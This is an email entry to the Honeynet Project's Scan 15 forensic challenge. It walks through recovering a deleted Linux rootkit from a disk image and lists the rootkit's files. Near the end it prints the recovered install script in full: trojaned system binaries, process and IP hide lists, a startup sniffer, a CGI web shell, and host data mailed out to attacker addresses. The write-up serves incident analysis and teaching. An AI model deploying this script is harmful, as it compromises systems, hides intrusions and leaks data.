From jkr006@csi1st.net Tue May 22 22:36:38 2001 Date: Thu, 03 May 2001 00:35:33 -0400 From: "John K. Riggleman, Jr." To: project@honeynet.org Subject: Entry for Scan15 Will be looking foward to seeing how the other people approached this problem. :) [ Part 2: "Attached Text" ] _____ ______ __ ___ ___ ____ ________ / ____| / _____| / \ | \ | | / __ \ | ____| / / | | / /\ \ | \ | | |_|| | | \___ | \____ | | / /__\ \ | |\ \| | | | |___ | \___ \ | | / ______ \ | | \ \ | | | \ | _____| | | |____ / / \ \ | | \ | ___| |___ _____| | \______/ \______| /_/ \_\ |_| \_| |_______| \______| ************************************************************************************************* * 1. - Show step by step how you identify and recover the deleted rootkit from the / partition. * ************************************************************************************************* (Note: The method that I used is doubtfully the best method. I did the recovery without the aide of special tools or programs. A text editor, hex editor, Linux system, and a programming language were all that were used (aside from an unzipping program). Just bear in mind that if this seems like a difficult way to recover the information, this way is not the only way.) |\///////////////| | | Tools used | | __________________|/\\\\\\\\\\\\\\\|________________ // \\ || EDIT.EXE / HIEW.EXE / A REDHAT SYSTEM / QBASIC || \\_________________________________________________// Initially I assumed that the rootkit would have been downloaded in the form of a TAR or TAR.GZ. Opening HIEW (hex editor), I searched for ".tar"..and the first instance was within the install script (part of the rootkit). At that point I descided to write a simple program to dump this information to a file. The QBasic program is attached to the end of this article along with some intresting offsets to dump. The program would request an "Start" and "End" offset..which I would get from the hex editor. After dumping this file and examining it, I noticed that a file called "computer" was created and emailed to two addresses. I let the hex editor search for "Cpu Speed:" (something that would not likely be in any other files)..and it resulted copies of the two emails with the data attached. After freeing up 256 megs on the Redhat system in the other room, I FTPed the image over the internal LAN. The file was actually larger than 255 megs..so I worked with what I had gotten to the system. After mounting the file as described by "http://project.honeynet.org/challenge", I looked into the directory specified in the install file. (/dev/ida/.drag-on/) After copying those files over the network to my NT system, I realized that I did not have the /usr/bin directory which would have most of the rootkit's files. Examining the install file again yielded the information that the file was actually "lk.tgz". Opening and comparing several TGZ files with EDIT, I noticed that each file began with the 3 characters: 31 139 8. Searching for these 3 characters within the image file produced an immediate result. Assuming that it could be a file other than the rootkit, I decided that trial-and-error would have to be adequate. The TGZ which was returned by the Qbasic program would extract to a .TAR in Winzip, but the TAR file would not extract. At that point I downloaded untar.exe at: http://www.albany.net/~cprimus/programs/untar.exe. Still only getting "ssh" out of the archive, I returned to tried-and-true EDIT. Searching for "last/" showed that the file after ssh was pidfile. By selecting/backspacing all of the entries before it, several more of the files extracted. The only problem which arose with this was that near the end of the file, around "last/top", a large number of NULLs were replaced by characters of the value D5h. I looked through the files which remained after "last/top" and noticed that I had them from the files I took from /dev/ida/.drag-on. Therefore, the only file I did not successfully recover was "top", but that would exist in the /usr/bin directory on: "/dev/hda5 /usr". ************************************************ * 2. - What files make up the deleted rootkit? * ************************************************ =============================== = Included in the initial TGZ = =============================== last/ # Directory for all of the files last/ssh # SSH daemon last/pidfile # File to hold PID of ssh daemon (declared in ssh_config) last/install # A shell script to install the rootkit last/linsniffer # A network sniffer last/cleaner # A BASH shell script to clean logs to remove evidence of entry last/inetd.conf # An inetd configuration file which is written over the current one last/lsattr # A shell script added to /etc/rc.d/rc.sysinit to restart the sniffer last/services # A service configuration file which is written over the current one last/sense # A parser for linsniffer's output last/ssh_config # self-explanatory last/ssh_host_key # self-explanatory last/ssh_host_key.pub # self-explanatory last/ssh_random_seed # self-explanatory last/sshd_config # self-explanatory last/sl2 # A port scanner last/last.cgi # CGI for issuing commands through a web browser last/ps # Trojanized process viewer last/top # Trojanized process viewer last/netstat # Trojanized network status viewer last/logclear # A script to delete linsniffer's log file last/s # Another SSH config file last/mkxfs # Another SSH daemon =================== = Generated files = =================== /dev/ida/.drag-on/tcp.log # For use by linsniffer /dev/ida/.. /tcp.log # For use by linsniffer (never used) /dev/last # List of addresses and ports to hide /dev/rpm # List of processes to hide /last/computer # System info. emailed to: bidi_damm@yahoo.com/last@linuxmail.org ~~~~~~~~~~~~~~~~~~~ Locations of files after installation ~~~~~~~~~~~~~~~~~~~ "/dev" rpm last "/dev/ida/.drag-on/" and "/dev/ida/.. /" linsniffer logclear mkxfs s sense sl2 ssh_host_key ssh_random_seed tcp.log "/bin" ps netstat "/sbin" ifconfig "/etc" inetd.conf services "usr/bin" lsattr top "usr/sbin" mkxfs "/home/httpd/cgi-bin/" or "/usr/local/httpd/cgi-bin/" or "/usr/local/apache/cgi-bin/" or "/www/httpd/cgi-bin" or "/www/cgi-bin/" (depending on if the directory exists). last.cgi ********* * BONUS * *************************************************************************** * Was the rootkit ever actually installed on the system? How do you know? * *************************************************************************** Yes, the rootkit was installed. The main fact to support this claim is the existance of /dev/last and /dev/rpm. That are generated from the install file, so it was absolutely run. Also, the existence of those 2 emails with the "computer" file attached shows that the install file did generate that file with statistics about the computer and mail them. To sidetrack slightly...... I find it quite perplexing that the files /dev/last and /dev/rpm were created when the rootkit's trojanized utilities look to /dev/caca and /dev/dsx. This is clearly a similar/the same rootkit used in Scan13...yet the person did not configure it correctly. The sniffer may start and all of the other elements, but the ports, addresses, and processes will not be hidden. Also note that the files that were placed into the ".drag-on" directory were also placed in the ".. " directory, even though these files are never used. <----------------------------------------------------------------------------------> <--------------------- John K. Riggleman Jr. 5/2/01 3:39 AM ---------------------> <----------------------------------------------------------------------------------> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (Note: For the QBasic program to work, the filenames and paths should be changed accordingly. I renamed the image to "h.d" to avoid long-filename problems in DOS) ============ = ETRT.BAS = ============ OPEN "e:\honeynet\h.d" FOR BINARY AS #1 OPEN "e:\honeynet\output" FOR BINARY AS #2 INPUT "Start Offset->", strt$ INPUT "End Offset->", endrt$ ar$ = "." FOR a = 1 TO (VAL(endrt$) - VAL(strt$)) GET #1, (VAL(strt$) + a - 1), ar$ PUT #2, a, ar$ NEXT PRINT "done" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ====================== = Offsets of intrest = ====================== Offsets for "install" Start-> 9303041 End -> 9306753 Offsets for "lk.tgz" Start-> 314369 End -> 837774 Offsets for the two emails of the "computer" file Start-> 92587009 End -> 92588868 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ================ = install file = ================ #!/bin/sh clear unset HISTFILE echo "********* Instalarea Rootkitului A Pornit La Drum *********" echo "********* Mircea SUGI PULA ********************************" echo "********* Multumiri La Toti Care M-Au Ajutat **************" echo "********* Lemme Give You A Tip : **************************" echo "********* Ignore everything, call your freedom ************" echo "********* Scream & swear as much as you can ***************" echo "********* Cuz anyway nobody will hear you and no one will *" echo "********* Care about you **********************************" echo echo chown root.root * if [ -f /usr/bin/make ]; then echo "Are Make !" else echo "Nu Are Make !" fi if [ -f /usr/bin/gcc ]; then echo "Are Gcc !" else echo "Nu Are Gcc !" fi if [ -f /usr/sbin/sshd/ ]; then echo "Are Ssh !" else echo "Nu Are Ssh !" fi echo -n "* Inlocuim nestat ... alea alea " rm -rf /sbin/ifconfig mv ifconfig /sbin/ifconfig rm -rf /bin/netstat mv netstat /bin/netstat rm -rf /bin/ps mv ps /bin/ps rm -rf /usr/bin/top mv top /usr/bin/top cp -f mkxfs /usr/sbin/ echo "* Gata..." echo -n "* Dev... " echo echo touch /dev/rpm >/dev/rpm echo "3 sl2" >>/dev/rpm echo "3 sshdu" >>/dev/rpm echo "3 linsniffer" >>/dev/rpm echo "3 smurf" >>/dev/rpm echo "3 slice" >>/dev/rpm echo "3 mech" >>/dev/rpm echo "3 muh" >>/dev/rpm echo "3 bnc" >>/dev/rpm echo "3 psybnc" >> /dev/rpm touch /dev/last >/dev/last echo "1 193.231.139" >>/dev/last echo "1 213.154.137" >>/dev/last echo "1 193.254.34" >>/dev/last echo "3 48744" >>/dev/last echo "3 3666" >>/dev/last echo "3 31221" >>/dev/last echo "3 22546" >>/dev/last echo "4 48744" >>/dev/last echo "4 2222" >>/dev/last echo "* Gata" echo "* Facem Director...Si Mutam Alea.. " mkdir -p /dev/ida/.drag-on mkdir -p /dev/ida/".. " echo "* Copiem ssh si alea" cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/ cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/".. " rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed touch /dev/ida/.drag-on/tcp.log touch /dev/ida/".. "/tcp.log cp -f inetd.conf /etc cp -f services /etc killall -HUP inetd echo echo echo echo "* Adaugam In Startup:) ..." rm -rf /usr/bin/lsattr echo "/usr/bin/lsattr -t1 -X53 -p" >> /etc/rc.d/rc.sysinit echo >> /etc/rc.d/rc.sysinit cp -f lsattr /usr/bin/ chmod 500 /usr/bin/lsattr chattr +i /usr/bin/lsattr /usr/bin/lsattr sleep 1 if [ -d /home/httpd/cgi-bin ] then mv -f last.cgi /home/httpd/cgi-bin/ fi if [ -d /usr/local/httpd/cgi-bin ] then mv -f last.cgi /usr/local/httpd/cgi-bin/ fi if [ -d /usr/local/apache/cgi-bin ] then mv -f last.cgi /usr/local/apache/cgi-bin/ fi if [ -d /www/httpd/cgi-bin ] then mv -f last.cgi /www/httpd/cgi-bin/ fi if [ -d /www/cgi-bin ] then mv -f last.cgi /www/cgi-bin/ fi echo "* Luam Informatiile dorite ..." echo "* Info : $(uname -a)" >> computer echo "* Hostname : $(hostname -f)" >> computer echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer echo "* Uptime : $(uptime)" >> computer echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer echo "* Spatiu Liber: $(df -h)" >> computer echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog " cat computer | mail -s "placinte" last@linuxmail.org cat computer | mail -s "roote" bidi_damm@yahoo.com echo "* Am trimis mailul ... stergem fisierele care nu mai trebuie ." echo echo echo "* G A T A *" echo echo "* That Was Nice Last " cd / rm -rf last lk.tgz computer lk.tar.gz ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ==================================================== = One of the emails containing the "computer" file = ==================================================== To: last@linuxmail.org Subject: placinte * Info : Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown * Hostname : asdf1 * IfConfig : inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0 inet addr:172.16.1.108 Bcast:172.16.1.255 Mask:255.255.255.0 * Uptime : 7:45pm up 8:23, 0 users, load average: 0.00, 0.00, 0.00 * Cpu Vendor ID : vendor_id : GenuineIntel * Cpu Model : model : 4 model name : Pentium MMX * Cpu Speed: cpu MHz : 200.457171 * Bogomips: bogomips : 399.77 * Spatiu Liber: Filesystem Size Used Avail Use% Mounted on /dev/hda8 251M 33M 205M 14% / /dev/hda1 23M 2.4M 19M 11% /boot /dev/hda6 1.6G 2.1M 1.5G 0% /home /dev/hda5 1.6G 367M 1.2G 23% /usr /dev/hda7 251M 5.3M 232M 2% /var